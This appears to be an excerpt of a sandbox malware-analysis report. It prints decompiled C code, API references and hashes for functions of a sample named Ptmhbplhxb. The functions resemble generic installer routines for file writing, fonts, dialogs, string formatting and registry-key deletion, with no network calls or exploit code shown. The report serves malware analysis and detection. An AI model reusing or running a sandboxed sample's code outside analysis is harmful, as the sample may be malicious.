                • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
                • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00402736(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402AC1(0xfffffff0);
				 *(_t56 - 0x34) = _t23;
				if(E0040596A(_t50) == 0) {
					E00402AC1(0xffffffed);
				}
				E00405AD9(_t50);
				_t26 = E00405AFE(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f418;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004031A9(_t45);
						E00403193(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x3c) = _t54;
						if(_t54 != _t45) {
							E00402F81( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x84) =  *_t54;
								E00405AB9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x84);
							}
							GlobalFree( *(_t56 - 0x3c));
						}
						E00405BA5( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00402F81(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x34));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                0x00402736
                0x00402738
                0x00402744
                0x00402747
                0x00402751
                0x00402755
                0x00402755
                0x0040275b
                0x00402768
                0x00402770
                0x00402773
                0x00402779
                0x00402787
                0x0040278c
                0x00402790
                0x00402793
                0x0040279c
                0x004027a8
                0x004027ac
                0x004027af
                0x004027b9
                0x004027de
                0x004027c0
                0x004027c5
                0x004027cd
                0x004027d3
                0x004027d8
                0x004027d8
                0x004027e5
                0x004027e5
                0x004027f2
                0x004027f8
                0x0040280a
                0x0040280a
                0x00402810
                0x00402810
                0x0040281b
                0x0040281c
                0x00402820
                0x00402824
                0x0040282a
                0x0040282a
                0x00402831
                0x00402237
                0x00402954
                0x00402960

                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                • GlobalFree.KERNEL32 ref: 004027E5
                • GlobalFree.KERNEL32 ref: 004027F8
                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Global$AllocFree$CloseDeleteFileHandle
                • String ID:
                • API String ID: 2667972263-0
                • Opcode ID: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
                • Opcode Fuzzy Hash: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E00401D95(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402A9F(2);
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402A9F(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E00405F87(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00405EC3();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                0x00401d95
                0x00401da0
                0x00401da2
                0x00401daf
                0x00401dc6
                0x00401dcb
                0x00401dd8
                0x00401ddd
                0x00401de1
                0x00401dec
                0x00401df3
                0x00401e05
                0x00401e0b
                0x00401e10
                0x00401e1a
                0x00402577
                0x00401569
                0x004028f9
                0x00402954
                0x00402960

                APIs
                • GetDC.USER32(?), ref: 00401D98
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                • ReleaseDC.USER32 ref: 00401DCB
                • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CapsCreateDeviceFontIndirectRelease
                • String ID:
                • API String ID: 3808545654-0
                • Opcode ID: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
                • Opcode Fuzzy Hash: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401D3B(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402AC1(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                0x00401d45
                0x00401d4c
                0x00401d7b
                0x00401d83
                0x00401d8a
                0x00401d8a
                0x00402954
                0x00402960

                APIs
                • GetDlgItem.USER32 ref: 00401D3F
                • GetClientRect.USER32 ref: 00401D4C
                • LoadImageA.USER32 ref: 00401D6D
                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                • DeleteObject.GDI32(00000000), ref: 00401D8A
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                • Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
                • Opcode Fuzzy Hash: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                • Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040484D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E0040484D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405F87(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405F87(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405F87(_t41, _t47, 0x42a870, 0x42a870, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a870), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebd8, _a4, 0x42a870);
			}



















                0x00404853
                0x00404858
                0x00404860
                0x00404861
                0x0040486e
                0x00404876
                0x00404877
                0x00404879
                0x0040487b
                0x0040487d
                0x00404880
                0x00404880
                0x00404887
                0x0040488d
                0x0040488d
                0x00404894
                0x0040489b
                0x0040489e
                0x004048a1
                0x004048a1
                0x004048a5
                0x004048b5
                0x004048b7
                0x004048ba
                0x00404863
                0x00404863
                0x0040486a
                0x0040486a
                0x004048c2
                0x004048cd
                0x004048e3
                0x004048f3
                0x0040490f

                APIs
                • lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                • wsprintfA.USER32 ref: 004048F3
                • SetDlgItemTextA.USER32 ref: 00404906
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
                • Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
                • Opcode Fuzzy Hash: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
                • Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 59%
                			E00401C04(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402A9F(3);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402A9F(4);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402AC1(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402AC1(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402AC1();
					_t32 = E00402AC1();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402A9F();
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t41 = E00402A9F(2);
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405EC3();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                0x00401c04
                0x00401c06
                0x00401c0d
                0x00401c10
                0x00401c13
                0x00401c1d
                0x00401c21
                0x00401c24
                0x00401c2d
                0x00401c2d
                0x00401c30
                0x00401c34
                0x00401c3d
                0x00401c3d
                0x00401c40
                0x00401c44
                0x00401c46
                0x00401c9b
                0x00401c9d
                0x00401ca6
                0x00401cae
                0x00401cb1
                0x00401cb1
                0x00401cba
                0x00000000
                0x00401c48
                0x00401c4f
                0x00401c51
                0x00401c54
                0x00401c5a
                0x00401c61
                0x00401c64
                0x00401c8c
                0x00401cc0
                0x00401cc0
                0x00401c66
                0x00401c74
                0x00401c7c
                0x00401c7f
                0x00401c7f
                0x00401c64
                0x00401cc3
                0x00401cc6
                0x00401ccc
                0x004028f9
                0x004028f9
                0x00402954
                0x00402960

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                • Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
                • Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                • Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004058FD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004058FD(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                0x004058fe
                0x00405915
                0x0040591d
                0x0040591d
                0x00405925

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004031DE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00405903
                • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004031DE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 0040590C
                • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 0040591D
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058FD
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 2659869361-2382934351
                • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                • Instruction ID: 647ad7e742d71b16062aa4f61d1124f0b3f0fcedfae467302285f0529c6cb9e2
                • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                • Instruction Fuzzy Hash: 46D0C9A2606A317AD21227159C09EDB6A4CCF57755B054076F640B61A1CA7C4D428BFE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00402BB4(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				char _v272;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E00405DEB(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
				if(_t19 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402BB4(__eflags, _v8,  &_v272, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E004062FD(3);
					if(_t28 == 0) {
						return RegDeleteKeyA(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}











                0x00402bbf
                0x00402bc8
                0x00402bd1
                0x00402bdd
                0x00402be4
                0x00402c08
                0x00402bee
                0x00402bf0
                0x00402c43
                0x00000000
                0x00402c4b
                0x00402bff
                0x00402c04
                0x00402c06
                0x00000000
                0x00000000
                0x00402c06
                0x00402c22
                0x00402c2a
                0x00402c31
                0x00000000
                0x00402c54
                0x00000000
                0x00402c3c
                0x00402c5e

                APIs
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                • RegCloseKey.ADVAPI32(?), ref: 00402C22
                • RegCloseKey.ADVAPI32(?), ref: 00402C43
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Close$Enum
                • String ID:
                • API String ID: 464197530-0
                • Opcode ID: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
                • Opcode Fuzzy Hash: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405996 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405996(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405928(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                0x0040599f
                0x004059a6
                0x004059a9
                0x004059ab
                0x004059af
                0x004059c4
                0x004059e3
                0x00000000
                0x004059cb
                0x004059cd
                0x004059ce
                0x004059d1
                0x004059d2
                0x004059da
                0x00000000
                0x00000000
                0x004059dc
                0x004059df
                0x00000000
                0x00000000
                0x00000000
                0x004059df
                0x00000000
                0x004059ce
                0x004059bc
                0x00000000
                0x004059bd

                APIs
                • CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004059A4
                • CharNextA.USER32(00000000), ref: 004059A9
                • CharNextA.USER32(00000000), ref: 004059BD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharNext
                • String ID: C:\
                • API String ID: 3213498283-3404278061
                • Opcode ID: 6f1ffd314258f60c9d8d37a97cd5dc7cb97b0114338afd6930da08174d9d3dc4
                • Instruction ID: 692bca14cad493fa5f8fffeffcf9af39aa377604f3823295436d19c4138fc52d
                • Opcode Fuzzy Hash: 6f1ffd314258f60c9d8d37a97cd5dc7cb97b0114338afd6930da08174d9d3dc4
                • Instruction Fuzzy Hash: CDF0C2E1918F50ABFB3252245C41B6B5F9CCB56374F04047BE240672C2C27858408B9A
                Uniqueness

                Uniqueness Score: -1.00%

